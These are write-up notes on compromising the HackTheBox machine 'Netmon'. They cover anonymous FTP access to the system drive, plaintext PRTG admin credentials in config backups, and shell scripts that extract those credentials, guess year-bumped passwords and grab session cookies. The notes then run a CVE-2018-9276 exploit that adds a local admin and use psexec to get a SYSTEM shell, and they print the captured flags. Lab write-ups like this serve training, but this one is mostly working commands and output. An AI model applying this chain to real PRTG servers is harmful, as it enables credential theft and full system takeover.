Not a complete walkthrough of the HackTheBox VM "Netmon", more some structured notes on hacking it.

A quick Nmap scan gives us this:

Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC

PRTG Network Monitor 18.1.37.13946 (open the web page in a browser; the login page shows the version Netmon is running)

So, we have PRTG Network Monitor from Paessler running (NETMON is the box's hostname, as the page title shows), served by Indy httpd 18.1.37.13946, an FTP server that allows anonymous login, and SMB on 139/445 (Windows' own implementation, not Samba). WinRM on 5985 is open as well, which is handy once we have credentials. A quick search on the PRTG version turns up these:

https://www.cvedetails.com/cve/CVE-2018-19410/
https://www.cvedetails.com/cve/CVE-2018-19411/
https://www.exploit-db.com/exploits/46527

The Exploit-DB entry is an authenticated remote code execution (CVE-2018-9276) and is the one we end up using; it needs a valid admin session, so credentials come first.

Let's try that FTP server first, and see where that leads us.

ftp 10.129.1.126   
Connected to 10.129.1.126.
220 Microsoft FTP Service
Name (10.129.1.126:nx): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  12:18AM                 1024 .rnd
02-25-19  10:15PM       <DIR>          inetpub
07-16-16  09:18AM       <DIR>          PerfLogs
02-25-19  10:56PM       <DIR>          Program Files
02-03-19  12:28AM       <DIR>          Program Files (x86)
02-03-19  08:08AM       <DIR>          Users
02-25-19  11:49PM       <DIR>          Windows
226 Transfer complete.

So, we're logged in using an anonymous account, and the listing (Windows, Program Files, Users) tells us the FTP root is the system drive itself. I wonder what else we can see..

ftp> cd Users
250 CWD command successful.

ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19  11:44PM       <DIR>          Administrator
02-03-19  12:35AM       <DIR>          Public
226 Transfer complete.

ftp> cd Public
250 CWD command successful.

ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  08:05AM       <DIR>          Documents
07-16-16  09:18AM       <DIR>          Downloads
07-16-16  09:18AM       <DIR>          Music
07-16-16  09:18AM       <DIR>          Pictures
02-03-19  12:35AM                   33 user.txt
07-16-16  09:18AM       <DIR>          Videos
226 Transfer complete.

ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.04 secs (0.8408 kB/s)
ftp> 

cat user.txt

dd58ce67b49e15105e88096c8d9255a5

Okay, we found user.txt. That's a start, but we need SYSTEM and root.txt. How do we get there?

ftp> cd "All Users"
250 CWD command successful.

ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  12:15AM       <DIR>          Licenses
11-20-16  10:36PM       <DIR>          Microsoft
02-03-19  12:18AM       <DIR>          Paessler
02-03-19  08:05AM       <DIR>          regid.1991-06.com.microsoft
07-16-16  09:18AM       <DIR>          SoftwareDistribution
02-03-19  12:15AM       <DIR>          TEMP
11-20-16  10:19PM       <DIR>          USOPrivate
11-20-16  10:19PM       <DIR>          USOShared
02-25-19  10:56PM       <DIR>          VMware
226 Transfer complete.
ftp> 

ftp> cd Users
250 CWD command successful.

ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19  11:44PM       <DIR>          Administrator
02-03-19  12:35AM       <DIR>          Public
226 Transfer complete.

ftp> ls -al
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19  11:44PM       <DIR>          Administrator
07-16-16  09:28AM       <DIR>          All Users
02-03-19  08:05AM       <DIR>          Default
07-16-16  09:28AM       <DIR>          Default User
07-16-16  09:16AM                  174 desktop.ini
02-03-19  12:35AM       <DIR>          Public
226 Transfer complete.

ftp> cd "All Users"
250 CWD command successful.

ftp> cd "Application data\Paessler\PRTG Network Monitor"
250 CWD command successful.

ftp> ls -al
200 PORT command successful.
125 Data connection already open; Transfer starting.
04-30-21  08:49AM       <DIR>          Configuration Auto-Backups
04-30-21  08:59AM       <DIR>          Log Database
02-03-19  12:18AM       <DIR>          Logs (Debug)
02-03-19  12:18AM       <DIR>          Logs (Sensors)
02-03-19  12:18AM       <DIR>          Logs (System)
04-30-21  08:59AM       <DIR>          Logs (Web Server)
04-30-21  08:54AM       <DIR>          Monitoring Database
04-30-21  10:29AM              1201112 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
04-30-21  10:12AM              1694657 PRTG Graph Data Cache.dat
02-25-19  11:00PM       <DIR>          Report PDFs
02-03-19  12:18AM       <DIR>          System Information Database
02-03-19  12:40AM       <DIR>          Ticket Database
02-03-19  12:18AM       <DIR>          ToDo Database
226 Transfer complete.
ftp> 

So, after some poking around, we found "Application data\Paessler\PRTG Network Monitor". Note that "All Users" did not show up in a plain ls, only in ls -al: it is a hidden link to C:\ProgramData, which is where PRTG keeps its configuration. Notice the backup files "PRTG Configuration.old" and "PRTG Configuration.old.bak"? Switch the FTP client to binary mode first (the ASCII-mode warning we got on user.txt would otherwise mangle them), download them, and search for prtgadmin (gedit with Ctrl+F works, so does grep -i).

</dbcredentials>
<dbpassword>
  <!-- User: prtgadmin -->
  PrTg@dmin2018
</dbpassword>

Hey look, old credentials! The .old.bak file dates from July 2018 (see the timestamps in the listing) and the password ends in 2018, so the obvious guess is that the current password follows the same pattern with the current year. It does: prtgadmin with PrTg@dmin2019 logs us into the PRTG web interface.
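Rather than paging through a megabyte of XML in gedit, the search and the year-bump guess can be scripted. The helper below is an added example, not part of the original notes: it runs on a constructed sample shaped like the snippet above (the second user in the sample is made up), and takes real "PRTG Configuration.*" files as arguments.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): pull the <dbpassword> entries,
# together with the "<!-- User: ... -->" comment PRTG writes next to them, out
# of PRTG configuration files, and derive the obvious year-bumped guesses.
# The sample below is constructed to mirror the snippet in the notes.

# Print "user<TAB>password" for every <dbpassword> block in the given files
# (or on stdin). awk keeps state while inside a block: the User: comment and
# the first non-empty, non-comment line, which is the stored value.
extract_prtg_db_creds() {
    awk '
        /<dbpassword>/   { inblk = 1; user = "?"; pw = ""; next }
        /<\/dbpassword>/ { if (inblk) printf "%s\t%s\n", user, pw; inblk = 0; next }
        inblk && /<!-- *User:/ {
            u = $0; sub(/.*User: */, "", u); sub(/ *-->.*/, "", u); user = u; next
        }
        inblk && NF && pw == "" { gsub(/^[ \t]+|[ \t\r]+$/, ""); pw = $0 }
    ' "$@"
}

# Constructed sample: same shape as the fragment found in
# "PRTG Configuration.old.bak"; the svc_monitor entry is invented.
sample_config() {
    cat <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<data>
  <dbcredentials>
  </dbcredentials>
  <dbpassword>
    <!-- User: prtgadmin -->
    PrTg@dmin2018
  </dbpassword>
  <dbpassword>
    <!-- User: svc_monitor -->
    Winter2018!
  </dbpassword>
</data>
EOF
}

# Given a password ending in a four-digit year, print it with the year bumped
# by 1..N (default 3): PrTg@dmin2018 -> PrTg@dmin2019, PrTg@dmin2020, ...
# Exits 1 when there is no trailing year to bump.
year_variants() {
    local pw=$1 n=${2:-3} base year i
    base=${pw%????}; year=${pw#"$base"}
    case $year in
        [0-9][0-9][0-9][0-9]) ;;
        *) echo "year_variants: no trailing year in '$pw'" >&2; return 1 ;;
    esac
    i=1
    while [ "$i" -le "$n" ]; do
        printf '%s%d\n' "$base" $((year + i))
        i=$((i + 1))
    done
}

# With file arguments: search those configs. Without: run on the sample.
main() {
    if [ $# -gt 0 ]; then extract_prtg_db_creds "$@"; else sample_config | extract_prtg_db_creds; fi |
    while IFS="$(printf '\t')" read -r user pw; do
        echo "user=$user password=$pw"
        year_variants "$pw" 2 | sed 's/^/  try next: /'
    done
}
main "$@"
```

Run it as `./prtg_creds.sh "PRTG Configuration.old.bak" "PRTG Configuration.old"` against the downloaded files; the year-bumped lines are the candidates to try against the login page, in order.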

Now, one of the exploits we found is an authenticated one: it needs a valid session cookie rather than a username and password. We have the credentials, but how do we get the cookie? A session cookie is just a string the server hands out in a Set-Cookie header when you log in; the browser stores it and sends it back with every later request, which is what keeps you logged in. So fire up the Burp Suite proxy, start intercepting, log into PRTG, and note the cookie in the requests that follow: "OCTOPUS1813713946=e0MwQUY2NTEwLTU3QjYtNEExNS04RDAxLTA1QTIwRUJDNkE1MH0%3D" (the browser's developer tools show the same value).
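The same cookie can be fetched from the command line, which is handy when the session expires halfway through. The script below is an added example, not from the original notes or from the exploit: it assumes the login form posts to /public/checklogin.htm with username and password fields (confirm that in Burp if your PRTG build differs), and the HTTP response it parses offline is constructed from the cookie above.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): get the PRTG session cookie
# from the command line instead of reading it out of Burp. PRTG names the
# cookie OCTOPUS followed by the build number (OCTOPUS1813713946 for
# 18.1.37.13946); "name=value" is exactly what exploit.sh -c expects.
# Assumption: the login form posts to /public/checklogin.htm.

# Read raw HTTP response headers on stdin and print "OCTOPUS<build>=<value>",
# dropping cookie attributes (path, HttpOnly, ...). Empty output means no
# session was issued, most likely because the credentials were wrong.
extract_octopus_cookie() {
    grep -i -o 'set-cookie: *OCTOPUS[0-9]*=[^;[:space:]]*' | head -n 1 | sed 's/^[^:]*: *//'
}

# Constructed response: what a successful login answer is assumed to look
# like, built around the cookie value captured in the notes.
sample_login_response() {
    printf 'HTTP/1.1 302 Found\r\n'
    printf 'Server: PRTG/18.1.37.13946\r\n'
    printf 'Set-Cookie: OCTOPUS1813713946=e0MwQUY2NTEwLTU3QjYtNEExNS04RDAxLTA1QTIwRUJDNkE1MH0%%3D; path=/; HttpOnly\r\n'
    printf 'Location: /\r\n\r\n'
}

# prtg_login URL USER PASS -> prints the cookie, exit 1 if none came back.
# -i keeps the response headers so the Set-Cookie line reaches the parser.
prtg_login() {
    local url=$1 user=$2 pass=$3 cookie
    cookie=$(curl -s -i \
        --data-urlencode "username=$user" --data-urlencode "password=$pass" \
        "$url/public/checklogin.htm" | extract_octopus_cookie)
    [ -n "$cookie" ] || { echo "prtg_login: no session cookie (bad credentials?)" >&2; return 1; }
    printf '%s\n' "$cookie"
}

# Offline demo on the constructed response:
sample_login_response | extract_octopus_cookie
# Live use, feeding the exploit from the notes (commented out so this runs offline):
#   ./exploit.sh -u http://10.129.1.126 \
#       -c "$(prtg_login http://10.129.1.126 prtgadmin 'PrTg@dmin2019')"
```

Because the exploit only ever sees the cookie, checking for an empty result before calling it saves a confusing run against a dead session.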

So, we have a working cookie now. Keep the admin panel open so the session stays valid, get the exploit ready, and fire it:

└─# ./exploit.sh -u http://10.129.1.126 -c "OCTOPUS1813713946=e0MwQUY2NTEwLTU3QjYtNEExNS04RDAxLTA1QTIwRUJDNkE1MH0%3D"

[+]#########################################################################[+] 
[*] Authenticated PRTG network Monitor remote code execution                [*] 
[+]#########################################################################[+] 
[*] Date: 11/03/2019                                                        [*] 
[+]#########################################################################[+] 
[*] Author: https://github.com/M4LV0                                        [*] 
[+]#########################################################################[+] 
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*] 
[*] Version: 18.2.38                                                        [*] 
[*] CVE: CVE-2018-9276                                                      [*] 
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*] 
[+]#########################################################################[+] 

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' 

[+]#########################################################################[+] 

 [*] file created 
 [*] sending notification wait....

 [*] adding a new user 'pentest' with password 'P3nT3st' 
 [*] sending notification wait....

 [*] adding a user pentest to the administrators group 
 [*] sending notification wait....


 [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun! 


So now we have a new local administrator on the box, named pentest with the password P3nT3st!. How do we use that? SMB on 445 is open, so Impacket's psexec.py is the obvious choice: https://github.com/SecureAuthCorp/impacket . Note what it does in the output below: it uploads a randomly named executable to the ADMIN$ share and registers and starts it as a service, which is why the shell comes back as SYSTEM. That binary, the service, and the extra admin account the exploit created are all artifacts a defender can spot, so on a real engagement record them and clean them up afterwards.

psexec.py pentest:'P3nT3st!'@10.129.1.126
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.129.1.126.....
[*] Found writable share ADMIN$
[*] Uploading file MMKoUFTw.exe
[*] Opening SVCManager on 10.129.1.126.....
[*] Creating service Gcuy on 10.129.1.126.....
[*] Starting service Gcuy.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>


And after some poking around, we find the flags:

C:\Users\Public>type user.txt
dd58ce67b49e15105e88096c8d9255a5


C:\Users\Administrator\Desktop>type root.txt
3018977fb944bf1878f75b879fba67cc

C:\Users\Administrator\Desktop>


That's it. If you followed along and got it to work, well done :)
Now, go hunt for the next box and give that a try; build your skills, and have fun doing it ;)
